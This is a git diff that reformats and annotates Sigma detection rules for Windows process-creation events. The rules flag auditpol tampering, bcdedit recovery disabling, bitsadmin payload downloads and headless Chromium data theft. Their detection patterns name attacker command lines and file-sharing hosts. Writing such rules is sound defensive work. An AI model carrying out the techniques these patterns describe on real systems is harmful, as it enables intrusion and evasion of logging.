+description: | + Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs references: - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 @@ -29,20 +25,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s' + CommandLine|contains: ' +s' selection_paths: - CommandLine|contains: - - ' %' + CommandLine|contains: + - ' %' # Custom Environment variable - \Users\Public\ - \AppData\Local\ - \ProgramData\ - \Downloads\ - \Windows\Temp\ selection_ext: - CommandLine|contains: + CommandLine|contains: - .bat - .dll - .exe @@ -51,7 +47,7 @@ detection: - .vbe - .vbs filter: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\TEMP\ - .exe condition: process_creation and (all of selection* and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml index ac3338bf4..161628e6f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml @@ -1,17 +1,12 @@ title: Audit Policy Tampering Via NT Resource Kit Auditpol id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e related: - - id: 0a13e132-651d-11eb-ae93-0242ac130002 - type: similar + - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version + type: similar status: test -description: 'Threat actors can use an older version of the auditpol binary available - inside the NT resource kit to change audit policy configuration to impair detection - capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol author: Nasreddine Bencherchali (Nextron Systems) @@ -29,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - /logon:none - /system:none - /sam:none @@ -39,8 +34,6 @@ detection: - /policy:none condition: process_creation and selection falsepositives: - - The old auditpol utility isn't available by default on recent versions of Windows - as it was replaced by a newer version. The FP rate should be very low except - for tools that use a similar flag structure + - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml index bb5b73274..2797ee99f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml @@ -1,16 +1,12 @@ title: Audit Policy Tampering Via Auditpol id: 0a13e132-651d-11eb-ae93-0242ac130002 related: - - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e - type: similar + - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol + type: similar status: test -description: 'Threat actors can use auditpol binary to change audit policy configuration - to impair detection capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Janantha Marasinghe (https://github.com/blueteam0ps) @@ -28,17 +24,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \auditpol.exe - - OriginalFileName: AUDITPOL.EXE + - Image|endswith: \auditpol.exe + - OriginalFileName: AUDITPOL.EXE selection_cli: - CommandLine|contains: - - disable - - clear - - remove - - restore + CommandLine|contains: + - disable # disables a specific audit policy + - clear # delete or clears audit policy + - remove # removes an audit policy + - restore # restores an audit policy condition: process_creation and (all of selection_*) falsepositives: - - Administrator or administrator scripts might leverage the flags mentioned in - the detection section. Either way, it should always be monitored + - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml index 38747f9dc..58e9a8705 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml @@ -1,9 +1,7 @@ title: Indirect Inline Command Execution Via Bash.EXE id: 5edc2273-c26f-406c-83f3-f4d948e740dd status: experimental -description: Detects execution of Microsoft bash launcher with the "-c" flag. This - can be used to potentially bypass defenses and execute Linux or Windows-based - binaries directly via bash +description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ author: frack113 @@ -21,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - Image|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml index e67f66734..11d0716ea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml @@ -1,12 +1,10 @@ title: Indirect Command Execution From Script File Via Bash.EXE id: 2d22a514-e024-4428-9dba-41505bd63a5b related: - - id: 5edc2273-c26f-406c-83f3-f4d948e740dd - type: similar + - id: 5edc2273-c26f-406c-83f3-f4d948e740dd + type: similar status: experimental -description: Detects execution of Microsoft bash launcher without any flags to execute - the content of a bash script directly. This can be used to potentially bypass - defenses and execute Linux or Windows-based binaries directly via bash +description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ - https://linux.die.net/man/1/bash @@ -25,20 +23,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - Image|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe filter_main_cli_flag: - CommandLine|contains: + CommandLine|contains: + # Note: we're not interested in flags being passed first - bash.exe - - bash - filter_main_no_cli: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_no_flag: - CommandLine: + CommandLine: - bash.exe - bash condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml index c29f1e981..97129c541 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml @@ -1,9 +1,7 @@ title: Boot Configuration Tampering Via Bcdedit.EXE id: 1444443e-6757-43e4-9ea4-c8fc705f79a2 status: stable -description: Detects the use of the bcdedit command to tamper with the boot configuration - data. This technique is often times used by malware or attackers as a destructive - way before launching ransomware. +description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html @@ -22,17 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - Image|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_set: - CommandLine|contains: set + CommandLine|contains: set selection_cli: - - CommandLine|contains|all: - - bootstatuspolicy - - ignoreallfailures - - CommandLine|contains|all: - - recoveryenabled - - 'no' + - CommandLine|contains|all: + - bootstatuspolicy + - ignoreallfailures + - CommandLine|contains|all: + - recoveryenabled + - no condition: process_creation and (all of selection_*) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml index f84b65be7..573ad88a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - Image|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - delete - deletevalue - import diff --git a/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml index f5dd2a475..5ff872b83 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of BgInfo.EXE id: 811f459f-9231-45d4-959a-0266c6311987 related: - - id: aaf46cdc-934e-4284-b329-34aa701e3771 - type: similar + - id: aaf46cdc-934e-4284-b329-34aa701e3771 + type: similar status: experimental -description: Detects suspicious child processes of "BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ @@ -30,22 +29,22 @@ detection: - \bginfo.exe - \bginfo64.exe selection_child: - - Image|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - Image|contains: - - \AppData\Local\ - - \AppData\Roaming\ - - :\Users\Public\ - - :\Temp\ - - :\Windows\Temp\ - - :\PerfLogs\ + - Image|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - Image|contains: + - \AppData\Local\ + - \AppData\Roaming\ + - :\Users\Public\ + - :\Temp\ + - :\Windows\Temp\ + - :\PerfLogs\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml index 00a52530a..d00abc4bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml @@ -1,11 +1,10 @@ title: Uncommon Child Process Of BgInfo.EXE id: aaf46cdc-934e-4284-b329-34aa701e3771 related: - - id: 811f459f-9231-45d4-959a-0266c6311987 - type: similar + - id: 811f459f-9231-45d4-959a-0266c6311987 + type: similar status: test -description: Detects uncommon child processes of "BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml index 5a3e62976..e0eba4cee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml @@ -24,16 +24,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_cmd: - CommandLine|contains: ' /transfer ' + CommandLine|contains: ' /transfer ' selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /create ' - ' /addfile ' selection_cli_2: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (selection_img and (selection_cmd or all of selection_cli_*)) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml index 31fe92689..17bace29f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml @@ -1,11 +1,10 @@ title: Suspicious Download From Direct IP Via Bitsadmin id: 99c840f2-2012-46fd-9141-c761987550ef related: - - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 - type: similar + - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 + type: similar status: test -description: Detects usage of bitsadmin downloading a file using an URL that contains - an IP +description: Detects usage of bitsadmin downloading a file using an URL that contains an IP references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -29,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -48,7 +47,7 @@ detection: - ://8 - ://9 filter_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml index c6bdaf8cc..c2563efd3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml @@ -26,16 +26,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_domain: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml index e8d7ea08a..f39f1ebdc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml @@ -24,15 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - .7z - .asax - .ashx diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml index 432616ce4..2881db31e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml @@ -1,8 +1,7 @@ title: File Download Via Bitsadmin To A Suspicious Target Folder id: 2ddef153-167b-4e89-86b6-757a9e65dcac status: experimental -description: Detects usage of bitsadmin downloading a file to a suspicious target - folder +description: Detects usage of bitsadmin downloading a file to a suspicious target folder references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -26,15 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\ProgramData\ - :\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index e994db5bb..e972f85a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -25,15 +25,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - Image|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%temp%' - '%tmp%' diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml index faee4b074..5b7e6a1c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml @@ -1,12 +1,7 @@ title: Monitoring For Persistence Via BITS id: b9cbbc17-d00d-4e3d-a827-b06d03d2380d status: test -description: BITS will allow you to schedule a command to execute after a successful - download to notify you that the job is finished. When the job runs on the system - the command specified in the BITS job will be executed. This can be abused by - actors to create a backdoor within the system and for persistence. It will be - chained in a BITS job to schedule the download of malware/additional binaries - and execute the program after being downloaded +description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html @@ -26,18 +21,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /SetNotifyCmdLine - CommandLine|contains: + CommandLine|contains: - '%COMSPEC%' - cmd.exe - regsvr32.exe selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /Addfile - CommandLine|contains: + CommandLine|contains: - 'http:' - 'https:' - 'ftp:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml index 9c465c92e..d93888188 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml @@ -1,12 +1,10 @@ title: Potential Data Stealing Via Chromium Headless Debugging id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 related: - - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 - type: derived + - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 + type: derived status: test -description: Detects chromium based browsers starting in headless and debugging mode - and pointing to a user profile. This could be a sign of data stealing or remote - control +description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control references: - https://github.com/defaultnamehere/cookie_crimes/ - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password @@ -26,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: - - --remote-debugging- + CommandLine|contains|all: + - --remote-debugging- # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc - --user-data-dir - --headless condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml index 7cfcea6fa..8ab64bbbc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml @@ -1,8 +1,8 @@ title: Browser Execution In Headless Mode id: ef9dcfed-690c-4c5d-a9d1-482cd422225c related: - - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e - type: derived + - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e + type: derived status: test description: Detects execution of Chromium based browser in headless mode references: @@ -28,7 +28,7 @@ detection: - \msedge.exe - \opera.exe - \vivaldi.exe - CommandLine|contains: --headless + CommandLine|contains: --headless condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml index ed14c0d6d..4f3a5ad4e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml @@ -1,11 +1,10 @@ title: File Download with Headless Browser id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e related: - - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c - type: derived + - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c + type: derived status: test -description: Detects execution of chromium based browser in headless mode using the - "dump-dom" command line to download files +description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files references: - https://twitter.com/mrd0x/status/1478234484881436672?s=12 - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html @@ -30,7 +29,7 @@ detection: - \msedge.exe - \opera.exe - \vivaldi.exe - CommandLine|contains|all: + CommandLine|contains|all: - --headless - dump-dom - http diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml index 85fa4bb34..4464d85da 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml @@ -1,11 +1,10 @@ title: Chromium Browser Instance Executed With Custom Extension id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 related: - - id: 27ba3207-dd30-4812-abbf-5d20c57d474e - type: similar + - id: 27ba3207-dd30-4812-abbf-5d20c57d474e + type: similar status: experimental -description: Detects a Chromium based browser process with the 'load-extension' flag - to start a instance with a custom extension +description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -31,10 +30,9 @@ detection: - \msedge.exe - \opera.exe - \vivaldi.exe - CommandLine|contains: --load-extension= + CommandLine|contains: --load-extension= condition: process_creation and selection falsepositives: - - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this - alert + - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml index d8888f884..119c0bd7f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml @@ -1,9 +1,7 @@ title: Chromium Browser Headless Execution To Mockbin Like Site id: 1c526788-0abe-4713-862f-b520da5e5316 status: experimental -description: Detects the execution of a Chromium based browser process with the "headless" - flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate - data). +description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). references: - https://www.zscaler.com/blogs/security-research/steal-it-campaign author: X__Junior (Nextron Systems) @@ -26,9 +24,9 @@ detection: - \opera.exe - \vivaldi.exe selection_headless: - CommandLine|contains: --headless + CommandLine|contains: --headless selection_url: - CommandLine|contains: + CommandLine|contains: - ://run.mocky - ://mockbin condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml index 9f0ca3598..bd7c84a68 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml @@ -1,11 +1,10 @@ title: Suspicious Chromium Browser Instance Executed With Custom Extension id: 27ba3207-dd30-4812-abbf-5d20c57d474e related: - - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 - type: similar + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + type: similar status: experimental -description: Detects a suspicious process spawning a Chromium based browser process - with the 'load-extension' flag to start an instance with a custom extension +description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -40,7 +39,7 @@ detection: - \msedge.exe - \opera.exe - \vivaldi.exe - CommandLine|contains: --load-extension= + CommandLine|contains: --load-extension= condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml index d5aacfa5c..fff9b52f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml @@ -1,10 +1,7 @@ title: File Download From Browser Process Via Inline URL id: 94771a71-ba41-4b6e-a757-b531372eaab6 status: test -description: Detects execution of a browser process with a URL argument pointing to - a file with a potentially interesting extension. This can be abused to download - arbitrary files or to hide from the user for example by launching the browser - in a minimized state. +description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. references: - https://twitter.com/mrd0x/status/1478116126005641220 - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ @@ -30,9 +27,9 @@ detection: - \opera.exe - \vivaldi.exe selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_extensions: - CommandLine|endswith: + CommandLine|endswith: - .7z - .dat - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml index 48a4fdcf5..65f238ea2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml @@ -1,11 +1,10 @@ title: Browser Started with Remote Debugging id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 related: - - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 - type: derived + - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 + type: derived status: test -description: Detects browsers starting with the remote debugging flags. Which is a - technique often used to perform browser injection attacks +description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks references: - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/ @@ -26,10 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_chromium_based: - CommandLine|contains: ' --remote-debugging-' + # Covers: --remote-debugging-address, 